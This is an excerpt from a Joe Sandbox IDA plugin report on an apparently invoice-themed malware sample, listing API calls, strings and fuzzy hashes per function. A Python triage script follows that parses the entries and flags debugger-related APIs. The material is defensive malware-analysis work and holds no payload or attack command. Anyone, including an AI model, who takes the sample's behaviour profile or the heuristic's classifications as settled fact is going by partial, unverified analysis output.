                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: FullNamePath_memmove_wcscat
                                          • String ID: SL
                                          • API String ID: 257928180-181245872
                                          • Opcode ID: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
                                          • Instruction ID: 43824745660c3988bd5ee8fabd2b32f2c8f8042702d18c831ff1fab54f9b3e1b
                                          • Opcode Fuzzy Hash: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
                                          • Instruction Fuzzy Hash: ED118274A15208AACB40EB648945FDD77B8AF08354B0044ABB948E7291EAB8B6C4471D
                                          APIs
                                            • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                            • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00458E73
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameSend_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 372448540-1403004172
                                          • Opcode ID: 9946c7197ab10ad9fde50dae1b7c0277909534bd518ba67c60e97b676ced7028
                                          • Instruction ID: b8e2c670fbb7cccfe9550cd9997642be974785ccb83f9afd7f496d9e06e76b61
                                          • Opcode Fuzzy Hash: 9946c7197ab10ad9fde50dae1b7c0277909534bd518ba67c60e97b676ced7028
                                          • Instruction Fuzzy Hash: 4001F971601118ABCF14FBA1CC429FE7368EF01320B100A2FBC25772D2DE39580CC655
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: __fread_nolock_memmove
                                          • String ID: EA06
                                          • API String ID: 1988441806-3962188686
                                          • Opcode ID: 52e4c11e8ef934338f3706a5bab433cb38c03b7aa91e080fe40e6f8015fadc0b
                                          • Instruction ID: 3cd15271acb3b06ac884f373c06a49f445b450121f82016c471601618c020999
                                          • Opcode Fuzzy Hash: 52e4c11e8ef934338f3706a5bab433cb38c03b7aa91e080fe40e6f8015fadc0b
                                          • Instruction Fuzzy Hash: 8F01F9719042287EDB18CAA9D816EFE7BFCDB11301F00459FF552D2181E878E6048764
                                          APIs
                                            • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                            • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00458D6B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameSend_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 372448540-1403004172
                                          • Opcode ID: d0242bd35a47d84e43d9a51d6d7b20f2831aa5b35d47bc754fff3bab3a4422aa
                                          • Instruction ID: f717951ca8db0a39ae808ededaa33f35f94e61068a96ac8ac9a889606be0a7e6
                                          • Opcode Fuzzy Hash: d0242bd35a47d84e43d9a51d6d7b20f2831aa5b35d47bc754fff3bab3a4422aa
                                          • Instruction Fuzzy Hash: 1701B1B1A41108ABCF14EBA1C952AFF73A8DF15341F10042FB805772D2DE285E0CD67A
                                          APIs
                                            • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                            • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00458DEE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameSend_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 372448540-1403004172
                                          • Opcode ID: ca68f18a7fa7c3bde14d10b92c765e559fdd9fc37852c13f41fffdb9c198d947
                                          • Instruction ID: a21a4701c09283d063fe79b367182633aa51a9950eb7d0e2c1ab54a0e2954309
                                          • Opcode Fuzzy Hash: ca68f18a7fa7c3bde14d10b92c765e559fdd9fc37852c13f41fffdb9c198d947
                                          • Instruction Fuzzy Hash: 36018FB1A41109ABDB11EAA5C942AFF77A8DF11301F20052FBC05732D3DE295E1DD67A
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 0045C534
                                            • Part of subcall function 0045C816: _memmove.LIBCMT ref: 0045C860
                                            • Part of subcall function 0045C816: VariantInit.OLEAUT32(00000000), ref: 0045C882
                                            • Part of subcall function 0045C816: VariantCopy.OLEAUT32(00000000,?), ref: 0045C88C
                                          • VariantClear.OLEAUT32(?), ref: 0045C556
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Variant$Init$ClearCopy_memmove
                                          • String ID: d}K
                                          • API String ID: 2932060187-3405784397
                                          • Opcode ID: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
                                          • Instruction ID: 9b6b4eac42ae89553be157e2085c7612e92dc5081679660b2cee5bd476f3b436
                                          • Opcode Fuzzy Hash: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
                                          • Instruction Fuzzy Hash: 401130B18007089FC710DFAAC8C089AF7F8FF18314B50852FE58AD7612E734AA48CB54
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ClassName_wcscmp
                                          • String ID: #32770
                                          • API String ID: 2292705959-463685578
                                          • Opcode ID: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
                                          • Instruction ID: c10ae28a8aa268df33283df1156ce4f732750d60ee08a51e76ed462bd539b068
                                          • Opcode Fuzzy Hash: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
                                          • Instruction Fuzzy Hash: 91E0D13260023837E7209B55AC45FA7F7ACDB55B71F11006BFD04D3151D5649A45C7E5
                                          APIs
                                            • Part of subcall function 0043B314: _memset.LIBCMT ref: 0043B321
                                            • Part of subcall function 00420940: InitializeCriticalSectionAndSpinCount.KERNEL32(004C4158,00000000,004C4144,0043B2F0,?,?,?,0040100A), ref: 00420945
                                          • IsDebuggerPresent.KERNEL32(?,?,?,0040100A), ref: 0043B2F4
                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0040100A), ref: 0043B303
                                          Strings
                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0043B2FE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                          • API String ID: 3158253471-631824599
                                          • Opcode ID: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
                                          • Instruction ID: 2b780658d3da49ad9f9e4503d56df9c93059da648c8d5ac8478d33f484e7c10e
                                          • Opcode Fuzzy Hash: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
                                          • Instruction Fuzzy Hash: 02E06DB02007208BD720AF29E5047467AE4EF14308F00897EE856C7341EBB8E488CBA9
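The function entries above follow one fixed layout (an APIs list with direct calls and "Part of subcall function" lines, a Strings list with xrefs, and a Similarity block carrying the API ID, Opcode ID and fuzzy hashes), which makes them straightforward to turn into triage data instead of reading them one by one. The Python below is an added example written for this page; it is not part of the Joe Sandbox report or its IDA plugin. The text it parses is two of the entries above copied into a constant. The ATL heuristic is an assumption added here: the string "ERROR : Unable to initialize critical section in CAtlBaseModule" is emitted by the ATL runtime's CAtlBaseModule constructor when critical-section setup fails, so an IsDebuggerPresent/OutputDebugStringW pair sitting next to that string is compiler-runtime start-up code and should not be counted as malware-authored anti-debugging on its own.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed input: two function entries copied from the report's IDA plugin section.
SAMPLE_REPORT = """
APIs
• VariantInit.OLEAUT32(?), ref: 0045C534
  • Part of subcall function 0045C816: _memmove.LIBCMT ref: 0045C860
  • Part of subcall function 0045C816: VariantInit.OLEAUT32(00000000), ref: 0045C882
  • Part of subcall function 0045C816: VariantCopy.OLEAUT32(00000000,?), ref: 0045C88C
• VariantClear.OLEAUT32(?), ref: 0045C556
Strings
Memory Dump Source
• Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
Similarity
• API ID: Variant$Init$ClearCopy_memmove
• String ID: d}K
• API String ID: 2932060187-3405784397
• Opcode ID: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
• Instruction Fuzzy Hash: 401130B18007089FC710DFAAC8C089AF7F8FF18314B50852FE58AD7612E734AA48CB54
APIs
  • Part of subcall function 0043B314: _memset.LIBCMT ref: 0043B321
  • Part of subcall function 00420940: InitializeCriticalSectionAndSpinCount.KERNEL32(004C4158,00000000,004C4144,0043B2F0,?,?,?,0040100A), ref: 00420945
• IsDebuggerPresent.KERNEL32(?,?,?,0040100A), ref: 0043B2F4
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0040100A), ref: 0043B303
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0043B2FE
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
• Opcode ID: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
• Instruction Fuzzy Hash: 02E06DB02007208BD720AF29E5047467AE4EF14308F00897EE856C7341EBB8E488CBA9
"""

# "• Name.MODULE(args), ref: ADDR" or "• Part of subcall function ADDR: Name.MODULE ref: ADDR"
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
STRING_RE = re.compile(r"^•\s*(?P<text>.*?),\s*xrefs:\s*(?P<xrefs>[0-9A-Fa-f ,]+)$")
KV_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<value>.*?)$")
SECTIONS = {"Strings": "strings", "Memory Dump Source": "dump",
            "Joe Sandbox IDA Plugin": "plugin", "Similarity": "similarity"}

@dataclass
class ApiRef:
    name: str
    module: str
    ref: str
    args: str
    subcall: Optional[str]  # callee address when the API is reached through a subcall

@dataclass
class FunctionEntry:
    apis: List[ApiRef] = field(default_factory=list)
    strings: List[Tuple[str, List[str]]] = field(default_factory=list)
    similarity: dict = field(default_factory=dict)

    @property
    def direct_apis(self) -> List[str]:
        return [a.name for a in self.apis if a.subcall is None]

def parse_entries(text: str) -> List[FunctionEntry]:
    """Split the plugin listing into one FunctionEntry per 'APIs' header."""
    entries, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":  # every function entry opens with its APIs list
            current, section = FunctionEntry(), "apis"
            entries.append(current)
        elif line in SECTIONS:
            section = SECTIONS[line]
        elif current is None:
            continue
        elif section == "apis" and (m := API_RE.match(line)):
            current.apis.append(ApiRef(m["name"], m["module"], m["ref"], m["args"] or "", m["sub"]))
        elif section == "strings" and (m := STRING_RE.match(line)):
            current.strings.append((m["text"], [x.strip() for x in m["xrefs"].split(",")]))
        elif section == "similarity" and (m := KV_RE.match(line)):
            current.similarity[m["key"]] = m["value"]
    return entries

ANTI_DEBUG_APIS = {"IsDebuggerPresent", "CheckRemoteDebuggerPresent",
                   "OutputDebugStringA", "OutputDebugStringW"}
# Assumption (added here): this string is emitted by ATL's CAtlBaseModule constructor.
ATL_INIT_STRING = "ERROR : Unable to initialize critical section in CAtlBaseModule"

def is_atl_init_stub(entry: FunctionEntry) -> bool:
    names = {a.name for a in entry.apis}
    return (ATL_INIT_STRING in {s for s, _ in entry.strings}
            and "IsDebuggerPresent" in names
            and bool(names & {"OutputDebugStringA", "OutputDebugStringW"}))

def flag_anti_debug(entries: List[FunctionEntry]) -> List[Tuple[str, List[str], bool]]:
    """Return (Opcode ID, matched APIs, is_runtime_stub) for every entry touching a debugger API."""
    hits = []
    for e in entries:
        found = sorted({a.name for a in e.apis} & ANTI_DEBUG_APIS)
        if found:
            hits.append((e.similarity.get("Opcode ID", ""), found, is_atl_init_stub(e)))
    return hits

if __name__ == "__main__":
    for opcode_id, apis, stub in flag_anti_debug(parse_entries(SAMPLE_REPORT)):
        print(opcode_id[:16], apis, "ATL start-up stub" if stub else "review manually")
```

On the two entries above, the VariantInit/VariantClear function produces no hit and the CAtlBaseModule function is flagged but classified as the runtime stub, which is the distinction a triage script needs before it escalates the "checks if a debugger is running" signature. Feeding it the whole plugin section works the same way, since every entry opens with an APIs header; the Opcode ID and Instruction Fuzzy Hash fields it keeps are the ones used to match functions across samples.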